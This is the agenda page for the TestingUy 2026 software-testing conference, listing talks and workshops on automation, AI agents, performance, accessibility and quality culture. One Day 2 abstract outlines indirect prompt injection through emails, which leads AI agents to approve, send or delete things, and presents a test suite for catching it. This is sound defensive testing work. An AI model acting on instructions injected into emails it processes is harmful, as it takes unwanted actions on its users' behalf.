2026 Edition

2026 Edition

April 15th online – April 16th in Montevideo, Uruguay

TestingUy 2026

On April 15th and 16th the twelfth edition of TestingUy will take place, an event for testers, developers, analysts, designers, product owners, managers, and anyone interested in software testing and quality.

On Day 1, eleven activities will take place fully online, and on Day 2 we will meet at the Torre de las Telecomunicaciones to enjoy thirteen sessions with local and international leaders from the testing world, plenty of networking, and more.

Access is free for all attendees, the agenda and registration are now available! Subscribe to our social media so you don’t miss any updates.

Call for speakers

Final call! Submit an activity until July 20.

TestingUy has been declared of national interest by the following organizations:

ANII
Ministerio de Educación y Cultura
Presidencia de la República
Uruguay Technology

¡2 days all about testing!

Speakers from ten countries, with a strong emphasis on Latin America, will be present across the 24 activities taking place this year: two keynotes, four workshops, one panel, two open spaces, and fifteen talks.

The program covers areas including AI, automation, performance, security, UX, accessibility, architecture, risk-based testing, and essential power skills, targeting a wide audience with diverse levels of expertise.

Take a look at the agenda and secure your spot

Agenda for day 1 - online

ACTIVITIES

April 15 – Online

10:00 - 10:05

WELCOME

Aníbal Banquero (CES), Guillermo Skrilec (QAlified), Gustavo Guimerans (CES), Yanaina López (QAlified)

10:05 - 10:50 | Activity in English

KEYNOTE: The Ahh Test

Rosie Sherry

-Activity in English-

The world is changing and we need new ways to think about what it means to ship a good product. The models of the past have helped us get to where we are, but when the world is in flux and chaos, what does it mean for the people who are building?

As quality people, we are challenged:
– we know we need to shift-left, right and everywhere
– most of us adopt our own version of being agile-ish
– test automation has shifted to developers and AI
– systems thinking is essential to understand the unavoidable complexity we face
– we need to find confidence to make the best decisions possible

I’d like to introduce you to the Ahh Test, it’s something we’ve been experimenting with internally within the MoTaverse to make decisions on what to build.

Whenever we want to build something, we ask whether it passes that Ahh Test. This is something anyone in the team can contribute to. In any meeting. In any Slack message. In any rant, personal thought or customer feedback.

If it doesn’t pass the Ahh Test, we shouldn’t build it, because it will only shift problems further down the line.

Join this session to:
– Learn what the Ahh Test is
– Why it matters
– Practical ideas and tactics on how you could adopt it

10:55 - 11:25

TALK: From Tester to Quality Engineer in the age of AI

Daniella Andrea Rojas Pacheco

Artificial intelligence is transforming the way we develop software… and the role of the tester as well.

Today, the challenge is no longer just about executing tests or automating scenarios, but about integrating quality from the very beginning, participating in technical decisions, and using AI as a strategic ally. In this context, the transition from tester to Quality Engineer is not just a change in title, but a shift in mindset.

In this talk, we will explore how GenAI is redefining traditional tasks, what opportunities it creates to enhance testers’ productivity and creativity, and which technical and human skills are becoming critical in this new stage.

I will share practical approaches to incorporating AI with purpose, without losing judgment or professional responsibility, and how to evolve from validating deliverables to co-creating value within agile teams.

Because in the age of AI, quality is not a phase of the process. It is a shared strategy.

10:55 - 13:10

OPEN LAB: ArtificialQA: Learn how to test AI agents in a guided, hands-on session

Natalia Nario, Guzmán Pieroni

Discover and try out a tool designed to evaluate the quality of conversational agents. We’ll show you how to connect an agent, define test cases, run automated tests, and assess responses using intelligent evaluators.

11:30 - 12:00

TALK: AI agents for testing: Automatic generation of BDD tests from heterogeneous sources

Beatriz Pérez, Eneko Pizarro

Web testing is essential for validating applications end-to-end, from the user interface to the backend. However, creating and maintaining these tests is costly. Before the rise of AI, our approach consistently followed the same path: tests that are easy for users to understand, written in natural language using Behaviour Driven Development (BDD), where Gherkin is used as the test specification language (very close to natural language), along with maintainable code following patterns such as the Page Object Model (POM).

However, writing tests in natural language for end users remains costly, and maintenance is still challenging as tests quickly become outdated with UI changes. Our proposal leverages generative AI and agents to support the creation and maintenance of E2E tests in the following ways:
– Automatically generates test specifications in Cucumber Gherkin from heterogeneous sources such as manuals, videos, meeting notes, and the application itself
– Automates implementation through code (currently in Java/Selenium, with an architecture extensible to Cypress and Playwright)
– Reviews UI changes to suggest improvements to existing test cases
– Integrates into your testing project through the MCP protocol

We will present our approach, which has been validated through case studies and a real industrial project. We will also discuss challenges, encountered issues, and future work.

12:05 - 12:35

OPEN SPACE by Testing Channel TV

Gastón Marichal, Marcos Manicera

12:40 - 13:10

TALK: Hardhat and quality in smart contracts

Matías Magni

In Web3, a code error means a permanent loss. This technical session explores how to use Hardhat to build robust, secure, and efficient smart contracts.

We will cover the professional workflow from local development to deployment: you’ll learn how to perform advanced debugging, run full-coverage tests, and automate security analysis using tools like Slither. We’ll also look at how to optimize gas consumption and ensure code auditability.

A practical, straightforward guide for developers and QAs looking to raise their engineering standards and protect their protocols against critical vulnerabilities. Quality is not optional, it is your best line of defense.

13:10 - 14:00

LUNCH - FREE TIME

14:00 - 14:30

TALK: Web performance principles: How to speed up eCommerce to improve conversion and experience

Maximiliano Vázquez

In today’s digital ecosystem, where competition is just a click away, web performance has become a critical factor for the success of any eCommerce site. This talk explores the key principles of web performance, covering both technical foundations and their direct impact on conversion, search ranking, and user retention.

We will present the most effective tools for measuring and diagnosing performance issues, with a focus on how to interpret results and prioritize improvements. We will also analyze the factors that most influence user experience, from initial load to full interaction, applied to real-world digital commerce scenarios.

With a practical perspective backed by more than nine years of experience optimizing high-traffic websites, this talk aims to provide clarity, focus, and actionable tools for teams looking to take their performance to the next level.

14:35 - 15:05

TALK: REST API Testing with the JUDO Framework

Felipe Farías

JUDO is a new framework that makes it easy to build REST API tests using Gherkin, without writing code or complex logic. It brings to Python the simplicity of the well-known Karate Framework for Java.

In this talk, you’ll learn what it’s about, how it can help simplify your REST API testing, and explore some truly useful features and capabilities.

15:10 - 15:40

PANEL: Latin America Tests: Communities, challenges, and the future

Moderators: Aníbal Banquero, Yanaina López | Panelists: Karla Mata, Rubén Aguirre, Marcela Mellado, Alexis Herrera, Angie Massiel

In this panel, representatives from different software testing communities across Latin America will share insights into the history and organization of their respective events, collaboration between communities, and the key challenges facing the discipline moving forward.

Communities from Bolivia, Chile, Colombia, Costa Rica, Venezuela, and Uruguay will take part.

15:45 - 16:15

TALK: Beyond the UI: Testing complex business logic in enterprise systems

Karen Joselin Morales Carreño

In business systems, such as payroll, tax, and finance platforms, many defects are not visual, but logical. In other words, a screen may appear correct because we see and review the UI, and sometimes we focus only on that, while the underlying business rules silently produce incorrect financial results.

This session explores how fundamental testing principles apply to complex real-world workflows. Through case studies involving tax calculation errors, payroll overtime errors, and misleading system behavior, we will examine real-world examples of how testers can go beyond superficial validation and adopt risk-based and logic-based testing approaches.
Our work as quality engineers goes beyond this, and in many cases requires us to know much more about calculations, taxes, etc.
Attendees will learn practical techniques for validating business rules, detecting hidden financial risks, and improving defect quality in complex environments.

16:20 - 17:00

CLOSING TALK: Beyond the symptom: Debugging for testers

Nadia Cavalleri

As a psychologist, I know it’s important not to stop at the symptom. As a tester, the same applies. This session will explore tools and techniques to debug bugs and move from “it doesn’t work” to understanding why it fails.

Agenda for day 2 - in person

TALKS

April 16 – Telecommunications Tower

9:00 - 9:45

CHECK-IN AND BREAKFAST

9:45 - 10:00|Conference hall: Mario Benedetti

WELCOME

Aníbal Banquero (CES), Guillermo Skrilec (QAlified), Mariana Travieso (CES), Yanaina López (QAlified)

10:00 - 10:45|Conference hall: Mario Benedetti

KEYNOTE: Autonomous fleets, unstoppable teams: The dawn of the agentic era

Carlos Gauto

Imagine a world where tests are not written: they are discovered, adapted, and continuously improved on their own. Where human teams stop fighting complexity and start striving for excellence. Where speed, coverage, and intelligence have no limits because they no longer depend on your time or constant attention.

That world becomes possible when you master Context Engineering, the key capability that transforms fragile prompts into truly autonomous agents aligned with business goals.

That world is no longer science fiction. It is the Agentic Era. And it’s not something that will happen to you, it’s something you can build, lead, and turn into an irreversible competitive advantage.

10:50 - 11:30|Conference hall: Mario Benedetti

TALK: Measuring isn't free (and sometimes it's very expensive)

Mariana Travieso, María Elisa Presto

In software, we use many metrics to track projects, products, and teams: defects, coverage, progress, productivity, incidents, among others. In theory, these numbers help us understand how the work is progressing and the state of the product.

But measuring isn’t free. It requires time to collect data, maintain tools, produce reports, and explain results. And sometimes it can be costly: when metrics become targets, results can be forced, teams may optimize for the numbers instead of understanding the product, or even make poor decisions based on data that doesn’t tell the full story.

Many testers (especially those just starting out) join teams where metrics are already in place and end up shaping how testing is done. Through real examples, some close to horror stories and others success cases, this talk invites us to look at testing within the system where it happens: teams, practices, goals, and incentives. The idea is to broaden perspectives and reflect on what we measure, why we measure it, and when measurement truly helps… and when it may cost more than it seems.

10:50 - 12:40|Room: Idea Vilariño

WORKSHOP: From bug to purpose: Building a culture of quality

Johana Ríos, Gastón Cabana

In a technical industry where we often prioritize tools and metrics, we sometimes forget the engine that sustains (or undermines) quality: people. A critical production bug is rarely just a coding error, it is often the symptom of an avoided conversation, a lack of clear purpose, or a diffuse system of accountability. This workshop offers a strategic pause to look at what lies behind the bugs.

Through a methodology that integrates transformational leadership, NLP, and organizational psychology, we will move from individual reflection to systemic action. We will analyze real cases to understand how psychological safety and intrinsic motivation directly impact the final product, turning continuous improvement from a theoretical concept into a shared mindset.

The goal is for each participant to go beyond “doing testing” and start focusing on quality. Attendees will take away concrete tools that can be applied immediately within their teams. This is an invitation to lead a mindset shift, connecting technical processes with the human factor that truly gives them meaning.

11:35 - 11:55|Conference hall: Mario Benedetti

Reliving 12 years of pure testing with TestingChannelTV

Gastón Marichal, Marcos Manicera

12:00 - 12:40|Conference hall: Mario Benedetti

TALK: Don't trust AI (until you test it)

Natalia Nario, Guzmán Pieroni

How reliable is an AI that evaluates another AI? When models share biases and limitations, the risk of incorrect validations is real. It’s the modern version of “who watches the watchers?” applied to testing.

In this talk, we explore how to calibrate AI evaluators, and why humans remain essential at every step. AI can suggest, but the final judgment is still ours.

This isn’t about AI replacing testers. It’s about testers evolving to validate increasingly complex systems.

12:40 - 14:10

LUNCH - FREE TIME

14:10 - 14:40|Conference hall: Mario Benedetti

TALK: After all this time automating… why haven't we made it work yet?

Javier Re

After years of investing in automation, many teams still face the same challenges: hard-to-maintain test suites, low confidence in results, and limited real impact on product quality.

So the question becomes inevitable: why haven’t we made it work yet?

This talk proposes a shift in perspective: understanding that automation doesn’t fail because of the tools, but because of how it is integrated into the team’s way of working. Based on industry evidence (World Quality Report, ISTQB, DORA), we will analyze key factors such as shared ownership, risk-based prioritization, and effective integration into the development workflow.

Building on these concepts, a practical approach is presented to improve automation adoption, focusing on design decisions, pipeline integration, and collaboration across roles.

The role of artificial intelligence is also explored as an enabler in this context. Rather than replacing strategy, AI can help reduce friction in tasks such as test generation, maintenance, and analysis, especially in environments where the pace of software change continues to accelerate.

The talk combines industry evidence with practical experience and is aimed at teams that already use automation but are looking to achieve more consistent and sustainable results.

14:10 - 15:50|Room: Idea Vilariño

WORKSHOP: Build your first testing agent with Tero (open source)

Federico Toledo, Roger Abelenda

Artificial intelligence is already part of a tester’s daily work, but it is often limited to isolated prompts that are not integrated into the team’s workflow. In this workshop, we will go a step further: we will build an AI testing agent from scratch, no coding required, using Tero, an open-source platform for designing, sharing, and running agents.

We will start from common testing challenges to design an agent with a clear purpose, such as understanding or generating documentation, creating diagrams from code, deriving test cases from exploratory testing notes, or supporting automation. You will learn how to define its behavior, provide context and domain knowledge through documentation (RAG), and connect it to external tools via MCP so it can not only “respond” but also take action and produce meaningful results.

During the workshop, we will build an agent together and test it with real use cases while iterating and refining it. The focus is not on the tool itself, but on the mindset: how to design agents that amplify the impact of testing, make quality visible, and integrate AI in a practical and responsible way into everyday work.

You will leave with a solid foundation to create your own agents and start using them right away.

14:45 - 15:15|Conference hall: Mario Benedetti

TALK: Inclusion and diversity through testing

Daniel Rojas, Juan Pablo Aguirre

In a world where software shapes experiences, decisions, and access, testers carry a responsibility that goes beyond the technical. Are we testing just to make things “work,” or to make them work for everyone?

This talk offers a thoughtful and practical perspective on how testing can (and should) uncover biases, exclusions, and barriers that often go unnoticed during development. From forms that assume your gender to apps that overlook visual accessibility, the most critical issues are not always the ones that throw exceptions.

We will share real cases where testing played a key role in preventing reputational damage, user loss, or direct discrimination. We will also explore how to test with empathy, what questions to ask, and how to bring these topics into conversations with Product, Design, and Development, without being seen as “the one who complicates things.”

You don’t need to be an expert in inclusion. You just need the willingness to open your eyes. Because sometimes, the worst bug is the one that doesn’t affect you, and that’s why you didn’t see it.

An invitation to test not only with criteria, but also with awareness.

15:20 - 15:50|Conference hall: Mario Benedetti

TALK: Neutrotest: Testing beyond Pass/Fail with neutrosophic assertions

Osmanys Pérez

Traditional testing frameworks are limited to binary outcomes: PASS or FAIL. But many real-world scenarios are more nuanced—services operating at the edge of expected response times, values close to a threshold, or texts that are “similar enough.” With binary assertions, all these subtleties remain hidden.

Neutrotest is an experimental Java assertion library that introduces neutrosophic logic into testing. Each verification is modeled across three dimensions: truth, indeterminacy, and falsity (T, I, F). The result remains a traditional test outcome (PASS/FAIL) and integrates seamlessly into CI pipelines, but it also generates additional classifications such as FRAGILE_PASS (a success close to failure) and BORDERLINE_FAIL (a failure close to success). This allows teams to understand not just whether a test passed, but by what margin. It integrates with JUnit 5 through a custom extension and API, includes a demo module, and can expose T, I, F values along with the associated classification (Neutrosophic Status) in reporting tools like Allure.

In this talk, we will walk through how it works with concrete examples: fuzzy assertions for numerical values, text, timing, and exceptions. We will also explore how to configure different contexts (strict, lenient, exploratory) and how to interpret results in Allure. The goal is to demonstrate a practical way to incorporate uncertainty into test analysis, without leaving the ecosystem of tools we already use.

15:50 - 16:30

COFFEE BREAK

16:30 - 17:00|Conference hall: Mario Benedetti

TALK: The false sense of quality: When everything is covered but something feels off

Roxana Falco

In recent years, development teams have adopted more practices, tools, and automation than ever before. We talk about metrics, coverage, pipelines, and more recently, artificial intelligence applied to testing. And yet, many of the quality issues we face remain the same.

This talk offers a reflective perspective: what if the problem isn’t a lack of testing, but an excess of confidence? Confidence in executed tests, in reassuring metrics, and in tools—including AI—that promise to cover risks.

Drawing from real experiences, we will explore how this confidence can create a false sense of control and shift reliance away from human judgment. This talk invites us to rethink the role of testers as agents of healthy skepticism, capable of pausing and asking the right questions, even when everything seems to be working fine.

16:30 - 17:35|Sala Idea Vilariño

WORKSHOP: I found a bug, now what? Effective communication for testers

Aníbal Banquero

Finding a bug is just the beginning. This workshop explores how testers can communicate clearly, choose the right channel, and ensure their findings drive real impact.

17:05 - 17:35|Conference hall: Mario Benedetti

TALK: Testing so my agents don't go rogue

Sebastián Passaro

Agent-based systems don’t just produce text: they take action. And when they fail, it’s not just “a sentence” that fails, but a decision, which can trigger unexpected side effects (approving, sending, deleting, tagging).

In this session, I’ll move beyond abstraction and theory to present a real case of agent-based systems operating over emails, how they can be exploited through indirect prompt injections, and how to turn that risk into a repeatable testing suite using Promptfoo: fixed cases, controlled inputs, and direct evaluation of agent outputs (actions/traces), validating invariant conditions in a deterministic layer, even when responses vary.

All of this will be shown by comparing a vulnerable version and a fixed version of the same system. The goal is for you to take away something practical and directly applicable to your work or personal projects.

17:40 - 18:25|Conference hall: Mario Benedetti

TALK: When the load generator becomes the bottleneck

Delvis Echeverría

In performance testing, the real bottleneck is sometimes not your application, it’s the load generator. When the generator becomes stressed, it contaminates the signal with CPU, memory, and other spikes, making results difficult to interpret.

In this talk, I review the evolution of load generators (processes → threads → event-driven) and present a controlled experiment using the same scenario, comparing three models, including a plan-based generator I’ve been working on.

18:25 - 18:45|Conference hall: Mario Benedetti

SWEEPSTAKES AND CLOSING

Aníbal Banquero (CES), Yanaina López (QAlified)

19:30 - 21:30|ThePutaMadre Bar

¡AFTER!

Sponsored by

GOLD Sponsors

ACTotal
CPA Ferrere
Relámpago

SILVER Sponsors

Abstracta
BIOS
Brightest
Crowdar
Kualitee
Pyxis
Uy Group

VENUE Sponsor

Antel

MEDIA Sponsors

Adolfo Blanco
DJ Academy
Kiwi Films
TestingChannelTV

Supported by

Organized by

Hosts

 

 

 

 

 

Anibal Banquero

 

 

 

 

 

Yanaina López

Collaborators

Ana Inés González Lamé

Diego Gawenda

Facundo de Battista

Ursula Bartram

Copyright ©2025 TestingUy. All Rights Reserved